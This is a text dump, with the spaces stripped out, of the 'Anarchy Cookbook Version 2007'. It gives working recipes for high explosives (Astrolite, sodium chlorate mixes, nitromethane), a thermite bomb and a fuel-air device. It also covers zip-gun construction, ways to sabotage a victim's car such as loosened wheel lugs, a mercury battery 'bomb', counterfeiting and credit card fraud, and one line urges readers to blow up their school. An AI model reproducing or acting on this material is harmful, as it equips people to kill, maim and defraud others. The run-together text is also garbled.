Simplypourthepowderintoaplasticbaggyandkneadinthevaselinecarefully. Thisexplosive(especiallyiftheSodiumChloratevariationisused)shouldnot beexposedtowaterormoisture. Thedetonationvelocitycanberaisedtoaslightextentbytheadditionof23% aluminumsubstitutedfor23%ofthevaseline.Thisadditionofthisaluminum willgivetheexplosiveabrightflashifsetoffatnightwhichwillruinnight visionforashortwhile.Thedetonationvelocityofthisexplosiveis approximately3200m/secforthepotassiumsaltand2900m/secforthesodium saltbasedexplosive. Itwasclaimedabovethatthisexplosivedegradesovertime.Iwouldassumethat thisoccursduetothesmallamountofwaterpresentinthevaseline,andthata differenttypeoffuelwouldbebetterthanthevaseline. ASSORTEDNASTIES: SweetOil Inthisoneyouopentherehoodandpoursomehoneyintheiroilspout.Ifyou havetimeyoumightremovertheoilplugfirstanddrainsomeoftheoilout.I havetriedthisonebutwasn'taroundtoseetheeffectsbutIamsurethatI didsomedamage. SlowAir OK,sneakupthevictimscarandpokeasmallholesomewherein2ofhis/her tires.Theyonlyhave1spare.Nowiftheholeissmallbuttherethenthere tirewillgoflatsomewhereontheroad.Youcouldslicethetiresothisis blowsoutontheroadwitharazorblade.Cutalongandfairlydeep(don'tcut aholeallthewaythrough)andpeelalittlebitoftherubberbackandcut thatoff.Nowverysoontheretireswillgoflatorapossibleblowoutata highspeedifyourlucky. VanishingPaint Spreadalittlegasorpaintthinneronthevictimscarandthiswillmakehis paintrunandfade.Vodkawilleatthepaintoffandsowillalittle190.Eggs workgreatonpaintiftheysittherelongenough. LooseWheel Loosenthelugsonyouvictimstiressothattheywillsoonfalloff.Thiscan reallyfucksomeoneupiftheyarecruisingwhenthetirefallsoff. DualNeutral Thisnamesucksbutpullthe10boltorwhatevertheyhavethereoff.(Onthe realwheels,inthemiddleoftheaxle)Nowthrowsomescrews,blots,nutsand assortedthingsinthereandreplacethecover.Atthispointyoucouldchip someoftheteethoffthegears. UnMidaser Crawlundertherecarwitharatchetandloosenallthenutsontheirexhaustso thatithangslowandwillfalloffsoon.Thismethodalsoworkson transmissionsbutisalittlehardertogetallboltsoff,buttheharderyou workthemoreyoufuckthemover. LAUGHINGGAS Learnhowtomakelaughinggasfromammoniumnitrate.Laughinggaswasoneof theearliestanesthetics.Afteralittlewhileofinhalingthegasthepatient

becamesohappy[ain'tlifegreat?]hecouldn'tkeepfromlaughing.Finallyhe woulddriftofftoapleasantsleep. Somedoityourselfershavediedwhiletakinglaughinggas.Thisisbecausethey hasgenerateditthroughplasticbagswhiletheirheadswereinside.Theywere simplysuffocatingbutweretoobombedouttorealizeit. Thetrickistohaveaplasticclothesbaginwhichyougeneratealotofthe gas.Thenyoustopgeneratingthegasandholdasmallopeningofthebagunder yournose,gettingplentyofoxygeninthemeantime.Then,Whee!Tomakeityou startwithammoniumnitrateboughtfromachemicalsupplyhouseorwhichyou havepurifiedwith100%rubbingorwoodalcohol. First,dissolveaquantityofammoniumnitrateinsomewater.Thenyouevaporate thewateroverthestove,whilestirring,untilyouhaveaheavybrine.When nearlyallthemoistureisoutitshouldsolidifyinstantlywhenadropisput onanicecoldmetalplate. Whenready,dumpitalloutonaverycoldsurface.Afterawhile,breakitup andstoreitinabottle. Aspoonfulisputintoaflaskwithaoneholestopper,withatubeleadinginto abigplasticbag.Theflaskisheatedwithanalcohollamp. Whenthetemperatureintheflaskreaches480Fthegaswillgenerate.Ifwhite fumesappeartheheatshouldbeloweredasthestuffexplodesat600F. Whenthebagisfilled,stoptheactionandgetreadytoturnon. CAUTION: NOsupplantsoxygeninyourblood,butyoudon'trealizeit.It'seasytodie fromNObecauseyou'resuffocatingandyourbreathingreflexdoesn'tknowit. Donotputyourheadinaplasticbag.Youwillcheerfullychoketodeath. PIPEOR"ZIP"GUNS Commonlyknownas"zip"guns,gunsmadefrompipehavebeenusedforyearsby juvenilepunks.Today'sMilitantsmakethemjustforthehellofitortoshoot onceinanassassinationorriotandthrowawayifthereisanydangerof apprehension. Theycanbeusedmanytimesbutwithsome,alengthofdowelisneededtoforce outthespentshell. Therearemanyvariationsbuttheillustrationshowsthebasicdesign. First,awoodenstockismadeandagrooveiscutforthebarreltorestin.The barrelisthentapedsecurelytothestockwithagood,strongtape. Thetriggerismadefromgalvanizedtin.Aslotispunchedinthetriggerflap toholdaroofingnail,whichiswiredorsolderedontotheflap.Thetriggeris bentandnailedtothestockonbothsides. Thepipeisashortlengthofonequarterinchsteelgasorwaterpipewitha borethatfitsinacartridge,yetkeepsthecartridgerimfrompassingthrough thepipe. Thecartridgeisputinthepipeandthecap,withaholeboredthroughit,is screwedon.Thenthetriggerisslowlyreleasedtoletthenailpassthroughthe holeandrestontheprimer. Tofire,thetriggerispulledbackwiththelefthandandheldbackwith thethumboftherighthand.Thegunisthenaimedandthethumbreleasesthe

triggerandthethingactuallyfires. Pipesofdifferentlengthsanddiametersarefoundinanyhardwarestore.All caliberbullets,fromthe.22tothe.45areusedinsuchguns. Somezipgunsaremadefromtwoorthreepipesnestedwithineachother.For instance,a.22shellwillfitsnuglyintoalengthofacar'scoppergasline. Unfortunately,thecopperistooweaktowithstandthepressureofthefiring. Sothelengthofgaslineisspreadwithglueandpushedintoawiderlengthof pipe.Thisisspreadwithglueandpushedintoalengthofsteelpipewith threadsandacap. Usingthismethod,youcanaccommodateanycartridge,evenarifleshell.The firstsizeofpipeforarifleshellaccommodatesthebullet.Thesecond accommodatesitswiderpowderchamber. A12gaugeshotguncanbemadefroma3/4inchsteelpipe.Ifyouwanttocomply withthegunlaws,thebarrelshouldbeatleasteighteenincheslong. Itsfiringmechanismisthesameasthatforthepistol.Itnaturallyhasa longerstockanditshandleislengthenedintoariflebutt.Also,asmallnail isdrivenhalfwayintoeachsideofthestockaboutfourinchesinthefrontof thetrigger.Therubberbandisputoveronenailandbroughtaroundthetrigger andsnaggedovertheothernail. Incaseyouactuallymakeazipgun,youshouldtestitbeforefiringitby hand.Thisisdonebyfirsttyingtheguntoatreeorpost,pointedtowhereit willdonodamage.Thenastringistiedtothetriggerandyougooffseveral yards.Thestringisthenpulledbackandletgo.Ifthebarreldoesnotblow up,thegunis(probably)safetofirebyhand.Repeatfiringsmayweakenthe barrel,soNOzipguncanbeconsidered"safe"touse. AstroliteandSodiumChlorateExplosives By:FutureSpy&TheFightingFalcon Note:InformationontheAstroliteExplosivesweretakenfromthebook'Two ComponentHighExplosiveMixtures'ByDesertPub'l Someofthechemicalsusedaresomewhattoxic,butwhogivesafuck!Goahead!I won'tevenbothermentioning'Thisinformationisforenlighteningpurposes only'!Iwouldloveitifeveryonemadeagallonofastroliteandblewtheir fuckingschooltokingdomscum! Astrolite Theastrolitefamilyofliquidexplosiveswereproductsofrocketpropellant researchinthe'60's.AstroliteA15issupposedtobetheworld'smost powerfulnonnuclearexplosiveatabout1.8to2timesmorepowerfulthanTNT. BeingmorepowerfulitisalsosafertohandlethanTNT(notthatitisn'tsafe inthefirstplace)andNitroglycerin. AstroliteG "AstroliteGisaclearliquidexplosiveespeciallydesignedtoproducevery highdetonationvelocity,8,600MPS(meters/sec.),comparedwith7,700MPSfor nitroglycerinand6,900MPSforTNT...Inaddition,averyunusualcharacteristic isthatittheliquidexplosivehastheabilitytobeabsorbedeasilyintothe groundwhileremainingdetonatable...Infieldtests,AstroliteGhasremained detonatablefor4daysintheground,evenwhenthesoilwassoakedduetorainy weather"knowwhatthatmeans?....AstroliteDynamite! Tomake(mixinfairlylargecontainer&outside)Twopartsbyweightof ammoniumnitratemixedwithonepartbyweight'anhydrous'hydrazine,produces AstroliteG...Simpleenougheh?I'msurethatthe2:1ratioisnotperfect,and

thatifyouscrewaroundwithitlongenough,thatyou'llfindabetterformula. Also,dunnowhythebooksays'anhydrous'hydrazine,hydrazineisalready anhydrous... Hydrazineisthechemicalyou'llprobablyhavethehardesttimegettingholdof. UsesforHydrazineare:Rocketfuel,agriculturalchemicals(maleichydrazide), drugs(antibacterialandantihypertension),polymerizationcatalyst,plating metalsonglassandplastics,solderfluxes,photographicdevelopers,diving equipment.Hydrazineisalsothechemicalyoushouldbecarefulwith. AstroliteA/A15 Mix20%(weight)aluminumpowdertotheammoniumnitrate,andthenmixwith hydrazine.Thealuminumpowdershouldbe100meshorfiner.AstroliteAhasa detonationvelocityof7,800MPS. MiscInfo Youshouldbecarefulnottogetanyoftheastroliteonyou,ifithappens though,youshouldflushtheareawithwater.AstroliteA&Gbothshouldbeable tobedetonatedbya#8blastingcap. SodiumChlorateFormulas SodiumChlorateissimilartopotassiumchlorate,andinmostcasescanbea substitute.Sodiumchlorateisalsomoresolubleinwater.Youcanfindsodium chlorateatChanneloranyhardware/homeimprovementstore.Itisusedin blowtorchesandyoucangetabout3lbsforabout$6.00. SodiumChlorateGunpowder 65%SodiumChlorate 22%Charcoal 13%Sulfur SprinklesofGraphiteontop RocketFuel 6partsSodiumChlorate 5partsRubberCement Mix*THOROUGHLY* RocketFuelII (BetterPerformance) 50%SodiumChlorate 35%RubberCement('OneCoat'brand) 10%EpoxyResinHardener 5%Sulfur Youmaywanttoaddmoresodiumchloratedependingonthepurityyouareusing. IncendiaryMixture 55%AluminumPowder(Atomized) 45%SodiumChlorate 5%Sulfur ImpactMixture 50%RedPhosphorus 50%SodiumChlorate Unlikepotassiumchlorate,sodiumchloratewon'texplodespontaneouslywhen mixedwithphosphorus.Ithastobehittobedetonated. Fillerexplosive 85%SodiumChlorate 10%Vaseline 5%AluminumPowder

Nitromethaneformulas IthoughtthatImightaddthisinsinceit'ssimilartoAstrolite. Nitromethane(CH3NO) SpecificGravity:1.139 FlashPoint:95F AutoIgnite:785F

Derivation:Reactionofmethaneorpropanewithnitricacidunderpressure. Uses:Rocketfuel;solventforcellulosiccompounds,polymers,waxes,fats,etc. Tobedetonatedwitha#8cap,add: 1. 2. 95%nitromethane+5%ethylenediamine 94%nitromethane+6%aniline

Poweroutput:2224%morepowerfulthanTNT.Detonationvelocityof6,200MPS. Nitromethane'solid'explosives 2partsnitromethane 5partsammoniumnitrate(solidpowder) Soakfor35min.Whendone,storeinanairtightcontainer.Thisissupposed tobe30%morepowerfulthandynamitecontaining60%nitroglycerin,andhas30% morebrilliance. MERCURYBATTERYBOMB! byPhuckedAgent! Materials: 1MercuryBattery(1or1.4VHearingAid) 1workinglampwithon/offswitch

ItisVERYSIMPLE!!!Hurray!Kidsunder18shouldn'tconsidertryingthisoneor elsetheywouldhavemercuricacidontheirfaces! 1. Turnthelampswitchontoseeiflitebulblightsup. 2. Ifwork,leavetheswitchonandunplugthecord 3. Unscrewthebulb(Don'ttouchthehotspot!) 4. Place1MercuryBatteryinthesocketandmakesurethatitistouching theHotspotcontact. 5. MoveanyobjectorfurnitureWhy?Theremaybesparksgivenoff! 6. Nowyourfavoritepart,standbackandplugincordinthesocket. 7. Andyouwillhavefun!!LikeRealParty!!! 219.ThermiteIV byKilroy

DISCLAIMER: Themakingandpossessionofthefollowingdevicesandmixturesisprobably illegalinmostcommunities.Theincendiariesarecapableofburninginexcess of5400Fandarenexttoimpossibletoextinguish.Ifyoumakethemyouaccept allresponsibilityfortheirpossessionanduse.Youalsoacceptall responsibilityforyourownstupidityandcarelessness.Thisinformationis intendedsolelytoeducate.AllFormulasarebyWeight Thermitesareagroupofpyrotechnicsmixturesinwhichareactivemetalreduces oxygenfromametallicoxide.Thisproducesalotofheat,slagandpuremetal. Themostcommonthermiteisferroaluminumthermite,madefromaluminum(reactive metal)andironoxide(metaloxide).Whenitburnsitproducesaluminumoxide (slag)andpureiron.Thermiteisusuallyusedtocutorweldmetal.Asan

experiment,a3lb.brickofthermitewasplacedonanaluminumengineblock. Afterthethermitewasdoneburning,onlyasmallportionofblockwasmelted. However,theblockwasverywarpedoutofshapeplustherewerecracksall throughtheblock.Ferrothermiteproducesabout930caloriespergramTheusual proportionsofferrothermiteare25%aluminumand75%ironoxideTheironoxide usuallyusedisnotrust(Fe2O3)butironscale(Fe3O4).Rustwillworkbutyou maywanttoadjustthemixturetoabout77%rust.Thealuminumisusuallycoarse powdertohelpslowdowntheburningrate.Thechemicalsaremixedtogether thoroughlyandcompressedintoasuitablecontainer.Afirstfiremixispoured ontopandignited. NOTE:Thermitesaregenerallyverysafetomixandstore.Theyarenotshockor frictionsensitiveandigniteatabout2000F. Afirstfiremixisamixturethatigniteseasierthanthermiteandburnshot enoughtolightthethermitereliably.Averygoodoneis: PotassiumNitrate5parts FinegroundAluminum3parts Sulfur2parts Mixtheabovethoroughlyandcombine2partsofitwith1partoffinely powderedferrothermite.Theresultingmixturecanbelightbysafetyfuseand burnsintensely. Oneproblemwiththermitesisthedifferenceinweightbetweenthealuminumand theoxide.Thiscausesthemtoseparateoutrenderingthethermiteuseless.One waytofixthisistouseabindertoholdthechemicalstoeachother.Sulfur isgoodforthis.CalledDiasite,thisformulausessulfurtobindallthe chemicalstogether.It'sdrawbackisthethermitemustbeheatedtomeltthe sulfur. IronOxide70% Aluminum23% Sulfur7%

Mixtheoxideandaluminumtogetherandputtheminanovenat325Fandletthe mixheatforawhile.Whenthemixtureishotsprinklethesulfuroveritand mixwell.Putthisbackintheovenforafewminutestomeltallthesulfur. Pullitbackoutandmixitagain.Whileitisstillhot,loadintocontainers foruse.Whenitcools,drilloutthediasitetoholdabout1015gramsof firstfiremix.Whendiasiteburnsitformssulfidecompoundsthatrelease hydrogensulfidewhenincontactwithwater.Thisrotteneggodorcanhamper firefightingefforts.Thermitecanbemadenottoseparatebycompressingit underacoupleoftonspressure.Theresultingpelletisstrongandburnsslower thanthermitepowder. CASTTHERMITE:Thisformulacanbecastintomoldsorcontainersandhardens intoasolidmass.Itdoesnotproduceasmuchironasregularferrothermite, butitmakesaslagwhichstaysliquidalotlonger.Makeamixturesas follows. PlasterofParis2parts FineandCoarseMixedAluminum2parts IronOxide3parts

Mixtogetherwellandaddenoughwatertowetdownplaster.Pouritintoamold andletitsitforhour.Pouroffanyextrawaterthatseparatesoutontop. Letthisdryinthesunforatleastaweek.Ordryinthesunforonedayand putina250Fovenforacoupleofhours.Drillitoutforafirstfiremix whendry.

THERMITEBOMB:Thermitecanbemadetoexplodebytakingthecastthermite formulaandsubstitutingfinepowderedaluminumforthecoarse/finemix.Take15 gramsoffirstfiremixandputinthecenterofapieceofaluminumfoil. Insertawaterprooffuseintothemixandgatherupthefoilaroundthefuse. Waterproofthefoil/fusewithathincoatofwax.Obtainatwopiecespherical moldwithadiameterofabout45inches.Waxoroiltheinsideofthemoldto helpreleasethethermite.Now,fillonehalfofthemoldwiththecast thermite.Putthefirstfire/fusepackageintothecenterofthefilledmold. Filltheotherhalfofthemoldwiththethermiteandassemblemold.Themold willhavetohaveaholeinitforthefusetostickout.Inaboutanhour, carefullyseparatethemold.Youshouldhaveaballofthermitewiththefirst firemixinthecenterofit,andthefusestickingoutoftheball.Drythe ballinthesunforaboutaweek.DONOTDRYITINANOVEN!Thefuseignitesthe firstfiremixwhichinturnignitesthethermite.Sincethethermiteisignited fromthecenterout,theheatbuildsupinthethermiteanditburnsfasterthan normal.Theresultisasmallexplosion.Thethermiteballburnsinasplit secondandthrowsmoltenironandslagaround.Usethiscarefully! THERMITEWELL:Tocutmetalwiththermite,takearefractorycrucibleanddrill a1/4in.holeinthebottom.Epoxyathin(20gal)sheetofmildsteeloverthe hole.Allowtheepoxytodry.Fillthecruciblewithferrothermiteandinserta firstfireigniterinthethermite.Fashionastandofftothecrucible.This shouldholdthecrucibleabout1in.up.Placethewelloveryourtargetand ignitethefirstfire.Thewellworksthisway.Thethermiteburns,makingslag andiron.Sincetheironisheavieritgoestothebottomofthewell.The moltenironburnsthroughthemetalsheet.Thisproducesasmalldelaywhich givestheironandslagmoretimetoseparatefully.Themoltenirondripsout throughtheholeinthebottomofthecrucible.Thestandoffallowsthethermite tocontinueflowingoutofthecrucible.Theforceofthedrippingironboresa holeinthetarget.A2lbthermitewellcanpenetrateupto3/4in.ofsteel. Experimentwithdifferentconfigurationstogetmaximumpenetration.Fora crucible,tryaflowerpotcoatedwithamagnesiumoxidelayer.Sometimesthe potcrackshowever.Takethecastthermiteformulaandadd50%ferrothermiteto it.Thisproducesafairamountofironplusaveryliquidslag. THERMITEFUELAIREXPLOSION:Thisisaverydangerousdevice.Askyourselfif youreallytrulywanttomakeitbeforeyoudoanyworkonit.Itisnextto impossibletogiveanydimensionsofcontainersorweightsofchargesbecauseof theavailabilityofpartschangesfromonepersontothenext.Howeverhereisa generaldescriptionofthisdeviceaffectionatelyknownasaHELLHOUND. Makeathermitechargeina1/8in.wallpipe.Thischargemustbeelectrically ignited.Attheoppositeendofthepipeawayfromtheignitorsideputasmall explosivechargeofflashpowderweighingabout1ozDrillasmallholeina pipeendcapandrunthewiresfromtheignitorthroughthehole.Sealthewires andholeupwithfuelproofepoxyorcement.Tryferrulecementavailableat sportinggoodsstores.Dopethethreadsoftheendcapswithagoodpipedope andscrewthemontothepipe.Thisgivesyouathermitechargeinanironpipe arrangedsothatwhenthethermiteiselectricallyignited,itwillburnfrom oneendtotheotherfinallysettingoftheflashpowdercharge.Placethis deviceinalargerpipeorverystoutmetalcontainerwhichissealedatone end.Useacoupleofmetal"spiders"tokeepthedeviceawayfromthewallsor endsofthelargercontainer.Runthewiresoutthroughthewallofthe containerandsealthewireswiththefuelproofepoxy.Fillthecontainerwith avolatileliquidfuel.Acetoneorgasolineworksgreat.Nowsealupthe containerwithanappropriateendcapanditisdone. Thedeviceworkslikethis:Attachatimerpowersupplytothewires.Whenthe thermiteisigniteditsuperheatstheliquidfuel.Sincethecontainerisstrong enoughtoholdthepressurethefueldoesnotboil.Whenthethermiteburnsdown totheexplosive,itexplodesrupturingthecontainerandreleasingthe superheatedfuel.Thefuelexpands,coolingoffandmakingafinemistandvapor

thatmixeswiththesurroundingair.Thehotthermiteslagisalsothrowninto theairwhichignitesthefuelairmix.Theresultisobvious.Tryabout1lbs ofthermitetoagallonoffuel.Forthepressurevessel,tryanoldpressure cooker.Becausethefuelmaydissolvetheepoxydon'tkeepthisdevicearound forverylong.Butaskyourself,doyoureallywanttomakethis? EXOTICTHERMITES:Thermitescanalsobemadefromteflonmagnesiumormetal fluoridesmagnesiumoraluminum.Ifthereisanexcessoffluoridecompoundin themixture,fluorinegascanbereleased.Fluorineisextremelycorrosiveand reactive.Thegascancauseorganicmaterialtoburstintoflamesbymere contact.Forteflonmagnesiumuse67%teflonand33%magnesium.Astrongfirst fireignitershouldbeusedtoignitethismixture.Boththeteflonandthe magnesiumshouldbeinpowderedform.Donotinhaleanysmokefromtheburning mixture.Ifyouusemetalfluoridesinsteadofteflon,usefluoridesoflow energymetals.Leadfluorideisagoodexample.Tryusing90%leadfluorideand 10%aluminum.Warning:Fluoridecompoundscanbeverypoisonous.Theyare approximatelyequaltocyanidecompounds.Anotherexoticmixistricalcium orthophosphateandaluminum.Whenthisburns,itformscalciumphosphidewhich whencontactswaterreleaseshydrogenphosphidewhichcanignitespontaneously inair.TricalciumorthophosphatehastheformulaCa3(PO4)2andisknownas whitelockite.Useabout75%orthophosphateand25%aluminum.Thisratiomay havetobealteredforbetterburningasIhavenotexperimentedwithitmuch anddon'tknowifmorealuminummayreducethecalciumbetter.Itdoesworkbut itisahardtoignitemixture.Afirstfiremixcontainingafewpercentof magnesiumworkswell. Fightingthermitefires:Twowaystofightthermitefiresareeithersmothering thethermitewithsand.Thisdoesn'tputoutthethermitebutitdoeshelp containitandblocksomeoftheheat.Theotherwayistofloodthethermite withagreatamountofwater.Thishelpstobreakthethermiteapartandstop thereaction.Ifyouuseasmallamountofwater,anexplosionmayresultasthe thermitemayreducethewaterandreleasehydrogengas.Thermitecanstartfires fromtheheatradiatingfromthereaction.Nearbyflammablesubstancescancatch fireeventhoughnosparksorflametouchthem.ANARCHYCOOKBOOKVERSION2007 TableofContents 1. CounterfeitingMoney 2. CreditCardFraud 3. MakingPlasticExplosives 4. PickingMasterLocks 5. TheArtsofLockpickingI 6. TheArtsofLockpickingII 7. SolidoxBombs 8. HighTechRevenge:TheBeigebox 9. CO?Bombs 10. ThermiteIIBombs 11. TouchExplosives 12. LetterBombs 13. PaintBombs 14. WaystosendacartoHELL 15. Doyouhateschool? 16. Phonerelatedvandalism 17. Highwaypoliceradarjamming 18. SmokeBombs 19. MailBoxBombs 20. Hotwiringcars 21. Napalm 22. FertilizerBomb 23. TennisBallBomb 24. DisketteBombs 25. UnlistedPhoneNumbers 26. Fuses

27. 28. 29. 30. 31. 32. 33. 34. 35. 36. 37. 38. 39. 40. 41. 42. 43. 44. 45. 46. 47. 48. 49. 50. 51. 52. 53. 54. 55. 56. 57. 58. 59. 60. 61. 62. 63. 64. 65. 66. 67. 68. 69. 70. 71. 72. 73. 74. 75. 76. 77. 78. 79. 80. 81. 82. 83. 84. 85. 86. 87. 88.

HowtomakePotassiumNitrate ExplodingLightbulbs Underwaterigniters Homebrewblastcannon ChemicalEquivalencyList PhoneTaps Landmines AdifferentMolitovCocktail PhoneSystemsTutorialI PhoneSystemsTutorialII BasicAllianceTeleconferencing AquaBoxPlans HindenbergBomb HowtoKillSomeone PhoneSystemsTutorialIII BlackBoxPlans TheBlottoBox Blowgun BrownBoxPlans CalciumCarbideBomb MoreWaystoSendaCartoHell RippingoffChangeMachines ClearBoxPlans CNANumberListing ElectronicTerrorism StartaConf.w/o2600hzorMF Dynamite AutoExhaustFlameThrower HowtoBreakintoBBsExpress Firebomb FuseBomb GenericBomb GreenBoxPlans PortableGrenadeLauncher BasicHackingTutorialI BasicHackingTutorialII HackingDEC's HarmlessBombs BreakingintoHouses Hypnotism RemoteInformerIssue#1 JackpottingATMMachines JugBomb FunatKMart MaceSubstitute HowtoGrowMarijuana MatchHeadBomb TerrorizingMcDonalds "Mentor's"LastWords TheMythofthe2600hzDetector BlueBoxPlans NapalmII NitroglycerinRecipe Operation:Fuckup StealingCallsfromPayphones PoolFun FreePostage UnstableExplosives WeirdDrugs TheArtofCarding RecognizingCreditCards HowtoGetaNewIdentity

89. 90. 91. 92. 93. 94. 95. 96. 97. 98. 99. 100. 101. 102. 103. 104. 105. 106. 107. 108. 109. 110. 111. 112. 113. 114. 115. 116. 117. 118. 119. 120. 121. 122. 123. 124. 125. 126. 127. 128. 129. 130. 131. 132. 133. 134. 135. 136. 137. 138. 139. 140. 141. 142. 143. 144. 145. 146. 147. 148. 149. 150.

RemoteInformerIssue#2 RemoteInformerIssue#3 RemoteInformerIssue#4 RemoteInformerIssue#5 Phreaker'sGuidetoLoopLines MaBellTutorial GettingMoneyoutofPayPhones ComputerbasedPBX PCPursuitPortStatistics PearlBoxPlans ThePhreakFile RedBoxPlans RemObS ScarletBoxPlans SilverBoxPlans BellTrashing CanadianWATSPhonebook HackingTRW HackingVAX&UNIX VerificationCircuits WhiteBoxPlans TheBLASTBox DealingwiththeR&ROperator CellularPhonePhreaking CheeseboxPlans StartYourOwnConferences GoldBoxPlans TheHistoryofESS TheLunchBox OliveBoxPlans TheTronBox MoreTRWInfo "Phreaker'sPhunhouse" PhrackMagazineVol.3,Issue27 PhrackMagazineVol.3,Issue27 PhrackMagazineVol.3,Issue28 PhrackMagazineVol.3,Issue28 PhrackMagazineVol.3,Issue28 PhrackMagazineVol.3,Issue30 PhrackMagazineVol.3,Issue30 PhrackMagazineVol.3,Issue30 SodiumChlorate MercuryFulminate ImprovisedBlackPowder NitricAcid DustBombInstructions CarbonTetExplosive MakingPicricAcidfromAspirin ReclamationofRDXfromC4 EggbasedGelledFlameFuels ClothespinSwitch FlexiblePlateSwitch LowSignatureSystem[Silencers] DelayIgniterFromCigarette Nicotine DriedSeedTimer NailGrenade BellGlossary PhoneDialLocksBeat'em ExchangeScanning AShortHistoryofPhreaking "SecretsoftheLittleBlueBox"

151. 152. 153. 154. 155. 156. 157. 158. 159. 160. 161. 162. 163. 164. 165. 166. 167. 168. 169. 170. 171. 172. 173. 174. 175. 176. 177. 178. 179. 180. 181. 182. 183. 184. 185. 186. 187. 188. 189. 190. 191. 192. 193. 194. 195. 196. 197. 198. 199. 200. 201. 202. 203. 204. 205. 206. 207. 208. 209. 210. 211. 212.

TheHistoryofBritishPhreaking "BadasShit" Telenet FuckingwiththeOperator PhrackMagazineVol.1,Issue1 InternationalCountryCodesList InfinityTransmitterPlans LSD Bananas YummyMarihuanaRecipes Peanuts ChemicalFireBottle IgniterfromBookMatches "RedorWhitePowder"Propellant PipeHandGrenade EuropeanCreditCardFraud PotassiumBomb YourLegalRights JuvenileOffenders'Rights DownTheRoadMissle FunWithShotgunShells SurveillanceEquipment DripTimer Stealing Miscellaneous Shavingcreambomb RippingoffchangemachinesII LockpickingtheEASYway Anarchy'N'ExplosivesPrelude Anarchy'N'ExplosivesVol.1 Anarchy'N'ExplosivesVol.2 Anarchy'N'ExplosivesVol.3 Anarchy'N'ExplosivesVol.4 Anarchy'N'ExplosivesVol.5 ExplosivesandPropellants LockpickingIII ChemicalEquivalentListII NitroglycerinII CelluloseNitrate StarterExplosives FlashPowder ExplodingPens RevisedPipeBombs *SAFETY*AMUSTREAD! AmmoniumTriIodide SulfuricAcid&Amm.NitrateIII BlackPowderIII Nitrocellulose RDX TheBlackGateBBS ANFOS PicricAcidII BottledExplosives DryIce Fuses/Ignitors/Delays FilmCanisterBombs BookBombs PhoneBombs SpecialAmmunition Rocketry PipeCannonII SmokeBombs

213. 214. 215. 216. 217. 218. 219.

Firecrackers SuppliersII LabRaidChecklist MiscAnarchy ComboLocksII MiscAnarchyII ThermiteIV

1.CounterfeitingMoneybyTheJollyRoger Beforereadingthisarticle,itwouldbeaverygoodideatogetabookonphoto offsetprinting,forthisisthemethodusedincounterfeitingUScurrency.If youarefamiliarwiththismethodofprinting,counterfeitingshouldbeasimple taskforyou. Genuinecurrencyismadebyaprocesscalled"gravure",whichinvolvesetchinga metalblock.Sinceetchingametalblockisimpossibletodobyhand,photo offsetprintingcomesintotheprocess. Photooffsetprintingstartsbymakingnegativesofthecurrencywithacamera, andputtingthenegativesonapieceofmaskingmaterial(usuallyorangein color).Thestrippednegatives,commonlycalled"flats",arethenexposedtoa lithographicplatewithanarclightplatemaker.Theburnedplatesarethen developedwiththeproperdevelopingchemical.Oneatatime,theseplatesare wrappedaroundtheplatecylinderofthepress. Thepresstouseshouldbean11by14offset,suchastheABDick360.Make2 negativesoftheportraitsideofthebill,and1ofthebackside.After developingthemandlettingthemdry,takethemtoalighttable.Usingopaque ononeoftheportraitsides,touchoutallthegreen,whichisthesealandthe serialnumbers.Thebacksidedoesnotrequireanyretouching,becauseitisall onecolor.Now,makesureallofthenegativesareregistered(linedup correctly)ontheflats.Bytheway,everytimeyouneedanotherserialnumber, shoot1negativeoftheportraitside,cutouttheserialnumber,andremovethe oldserialnumberfromtheflatreplacingitwiththenewone. Nowyouhaveall3flats,andeachrepresentsadifferentcolor:black,and2 shadesofgreen(thetwoshadesofgreenarecreatedbymixinginks).Nowyou arereadytoburntheplates.Takealithographicplateandetchthreemarkson it.Thesemarksmustbe2and9/16inchesapart,startingononeoftheshort edges.Dothesamethingto2moreplates.Then,take1oftheflatsandplace itontheplate,exactlyliningtheshortedgeupwiththeedgeoftheplate. Burnit,moveituptothenextmark,andcoveruptheexposedareayouhave alreadyburned.Burnthat,anddothesamething2moretimes,movingtheflat uponemoremark.Dothesameprocesswiththeother2flats(eachonaseparate plate).Developallthreeplates.Youshouldnowhave4imagesoneachplate withanequalspacebetweeneachbill. Thepaperyouwillneedwillnotmatchexactly,butitwilldoformost situations.Thepapertouseshouldhavea25%ragcontent.Bytheway,Disaperf computerpaper(invisibleperforation)doesthejobwell.Takethepaperand loaditintothepress.Besuretosettheair,buckle,andpaperthickness

right.Startwiththeblackplate(theplatewithouttheserialnumbers).Wrap itaroundthecylinderandloadblackinkin.Makesureyourunmorethanyou needbecausetherewillbealotofrejects.Then,whilethatisprinting,mix theinksfortheserialnumbersandthebackside.Youwillneedtoaddsome whiteandmaybeyellowtotheserialnumberink.Youalsoneedtoaddblackto thebackside.Experimentuntilyougetitright.Now,cleanthepressandprint theotherside.Youwillnowhaveabillwithnogreensealorserialnumbers. Printafewwithoneserialnumber,makeanotherandrepeat.Keepdoingthis untilyouhaveasmanydifferentnumbersasyouwant.Thencutthebillstothe exactsizewithapapercutter.Youshouldhaveprintedalargeamountofmoney bynow,butthereisstilloneproblem;thepaperispurewhite.Todyeit,mix thefollowinginapan:2cupsofhotwater,4teabags,andabout16to20 dropsofgreenfoodcoloring(experimentwiththis).Diponeofthebillsinand compareittoagenuineUSbill.Makethenecessaryadjustments,anddyeallthe bills.Also,itisagoodideatomakethemlookused.Forexample,wrinkle them,rubcoffeegrindsonthem,etc. Asbeforementioned,unlessyouarefamiliarwithphotooffsetprinting,mostof theinformationinthisarticlewillbefairlyhardtounderstand.Alongwith gettingabookonphotooffsetprinting,trytoseethemovie"ToLiveandDie inLA".Itisaboutacounterfeiter,andtheproducerdoesaprettygoodjobof showinghowtocounterfeit.Agoodbookonthesubjectis"ThePoorMan'sJames Bond". Ifallofthisseemstoocomplicatedtoyou,thereisoneothermethodavailable forcounterfeiting:TheCanoncolorlasercopier.TheCanoncanreplicate ANYTHINGinvibrantcolor,includingUScurrency.But,onceagain,themain problemincounterfeitingisthepaperused.So,experiment,andgoodluck! 2.CreditCardFraudbyTheJollyRoger Formostofyououtthere,moneyishardtocomeby.Untilnow: Withtherecentadventofplasticmoney(creditcards),itiseasytouse someoneelse'screditcardtoordertheitemsyouhavealwaysdesiredinlife. Thestakesarehigh,butthepayoffisworthit. StepOne:Gettingthecreditcardinformation Firstoff,youmustobtainthecrucialitem:someone'screditcardnumber.The bestwaytogetcreditcardnumbersistotakethebluecarbonsusedinacredit cardtransactionatyourlocaldepartmentstore.Thesecanusuallybefoundin thegarbagecannexttotheregister,orforthemoredaring,inthegarbage 